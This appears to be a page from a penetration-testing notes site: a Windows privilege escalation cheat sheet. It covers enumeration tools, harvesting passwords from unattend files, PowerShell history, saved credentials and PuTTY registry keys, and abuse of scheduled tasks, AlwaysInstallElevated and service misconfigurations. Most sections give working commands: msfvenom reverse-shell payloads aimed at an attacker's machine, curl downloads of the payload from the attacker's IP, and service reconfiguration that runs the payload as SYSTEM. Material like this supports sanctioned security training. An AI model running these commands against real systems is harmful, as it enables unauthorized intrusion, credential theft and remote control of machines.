Windows

A list of Privilege Escalation Techniques for Windows.

Local Privesc Scanner

winPEAS

winPEAS is a script that search for possible paths to escalate privileges on Windows hosts.

Github: https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS

PrivescCheck

This script aims to enumerate common Windows configuration issues that can be leveraged for local privilege escalation. It also gathers various information that might be useful for exploitation and/or post-exploitation.

Github: https://github.com/itm4n/PrivescCheck

Windows Exploit Suggester - Next Generation (WES-NG)

WES-NG is a tool based on the output of Windows' systeminfo utility which provides the list of vulnerabilities the OS is vulnerable to, including any exploits for these vulnerabilities. Every Windows OS between Windows XP and Windows 11, including their Windows Server counterparts, is supported.

Github: https://github.com/bitsadmin/wesng

Automatic privesc tools

PowerUP

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations.

Running Invoke-AllChecks will output any identifiable vulnerabilities along with specifications for any abuse functions. The -HTMLReport flag will also generate a COMPUTER.username.html version of the report.

Github: PowerUP

⚠️ This tool is no longer supported

Sherlock

PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.

Github: Sherlock

⚠️ This tool is no longer supported

Watson

Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.

Github: Watson

⚠️ This tool is no longer supported

Impersonation

JuicyPotatoNG

Allow a Windows Service Accounts to privesc to NT AUTHORITY\SYSTEM when SeImpersonate or SeAssignPrimaryToken privilege are enabled.

# Get a shell on the machine
.\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i

Github: https://github.com/ohpe/juicy-potato

Harvesting passwords

Unattended windows installations

Unattended windows installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations:

C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml

Credentials could be stored in these files.

Powershell history

From cmd:

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

From PowerShell:

type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Windows saved credentials

Use the following command to list the saved credentials:

cmdkey /list

If you see some saved credentials you can run a new shell as this user:

runas /savecred /user:privileged_user cmd.exe

IIS configuration

You might find IIS configuration files in the following locations:

C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config

You can search for "connectionString" to find some database credentials in the config file.

type web.config | findstr connectionString

PuTTY proxy credentials

To retrieve the stored proxy credentials, you can search under the following registry key for ProxyPassword with the following command:

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

Missconfigurations

Scheduled tasks

Look for scheduled task that either lost its binary or it's using a binary you can modify.

List scheduled tasks:

schtasks

See the details of a task:

schtasks /query /tn vulnerable_task /fo list /v

The program executed by the task will be listed under "Task To Run:". If you can modify this binary, you can run code as the user running the task (listed under "Run as User:"). You can use icacls to check the file permissions.

C:\> icacls c:\tasks\schtask.bat
c:\tasks\schtask.bat NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(F)

In this example you can see that the groups who have "(F)" are the groups which have full access to the file. If you are in one of these groups, you can replace it by your payload to execute the code you want, just keep the name used in the scheduled task.

Always Install Elevated

You need to check that two regirsty keys are set to know if the machine is exploitable. You can check them with the following commands:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If both are set, the machine is epxloitable. By using msfvenom you can generate a msi payload that will exploit the vulnerability.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f msi -o reverse_shell.msi

Then start a metasploit handler on your attack machine, set the payload to be the same as the one use with msfvenom. Then drop your payload on the vulnerable machine and execute it by using the following command:

msiexec /quiet /qn /i <path_to_the_payload>

Insecure permissions on service executable

If the executable associated with a service has weak permissions that allow an you to modify or replace it, you can gain the privileges of the service's account trivially.

First check the services details to see which binary the service is using and account used to running the service:

sc qc <vulnerable_service>

⚠️ If you are in a Powershell shell use sc.exe as sc is an alias to "Set-Content"

The "SERVICE_START_NAME" is the user used to run the service and the "BINARY_PATH_NAME" is the path of the binary ran by the service. You can use icacls to check the file permissions.

C:\> icacls <vunerable_binary_path>
<vunerable_binary_path> Everyone:(I)(M)
                        NT AUTHORITY\SYSTEM:(I)(F)
                        BUILTIN\Administrators:(I)(F)
                        BUILTIN\Users:(I)(RX)
                        APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                        APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

In this example you can see that Everyone has the modify permissions "(M)". You can replace it by your payload to execute the code you want, just keep the path used in the service. Make sure that you generate a correct service binary, to do so yo ucan use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine, drop the payload on the vulnearble machine and replace the binary used by the service by your payload:

move <vunerable_binary_path> <vunerable_binary_path>.bak
curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o <vunerable_binary_path>

Then restart the service.

sc stop <vulnerable_service>
sc start <vulnerable service>

Unquoted service paths

It the binary path used by a service is not quoted, windows will split the path on the spaces and try to execute them.

Example: BINARY_PATH_NAME : C:\foo bar\foo.exe Windows will try to execute first C:\foo.exe and if it doesn't work C:\foo bar\foo.exe. So if you have the permissions to create files in foo.exe you can run code as the service's account. You can check this by using icacls.

Make sure that you generate a correct service binary, to do so yo ucan use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine, drop the payload on the vulnearble machine and replace the binary used by the service by your payload:

curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o C:\foo.exe

Then restart the service.

sc stop <vulnerable_service>
sc start <vulnerable service>

Insecure service permissions

If you can modify a service's configuration you can just edit the binary used and put the path to your payload. To check if you have the permissions to edit it you can use accesschk:

C:\> accesschk64.exe -qlc <vulnerable_service>
  [0] ACCESS_ALLOWED_ACE_TYPE: NT AUTHORITY\SYSTEM
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_PAUSE_CONTINUE
        SERVICE_START
        SERVICE_STOP
        SERVICE_USER_DEFINED_CONTROL
        READ_CONTROL
  [4] ACCESS_ALLOWED_ACE_TYPE: BUILTIN\Users
        SERVICE_ALL_ACCESS

Here we can see that the BUILTIN\\Users group has the SERVICE_ALL_ACCESS permission, which means any user can reconfigure the service.

Make sure that you generate a correct service binary, to do so yo ucan use msfvenom:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attack_machine_ip> LPORT=9001 -f exe-service -o reverse_shell_svc.exe

Then start a metasploit handler with the correct payload on your attacking machine, drop the payload on the vulnearble machine and replace the binary used by the service by your payload:

curl http://<attacker_machine_ip>:8000/reverse_shell_svc.exe -o C:\reverse_shell_svc.exe

Edit the service's configuration:

sc config <vulnerable_service> binPath= "C:\reverse_shell_svc.exe" obj= LocalSystem

The obj parameter is used to chose which account will run the service

Then restart the service:

sc stop <vulnerable_service>
sc start <vulnerable service>

Windows privileges

First run an terminal as administrator to enable all your privileges. Then check which privileges you have enabled:

whoami /priv

Then check the Priv2Admin repo to see what theses privileges enable you to do.

Resources

PayloadsAllTheThings - Windows Privesc

dmcx' Red Team Notes 2.0 - Privesc

ired.team notes - privesc

Hacktricks - Windows privesc

PreviousLinux NextLateral Movement

Last updated 6 months ago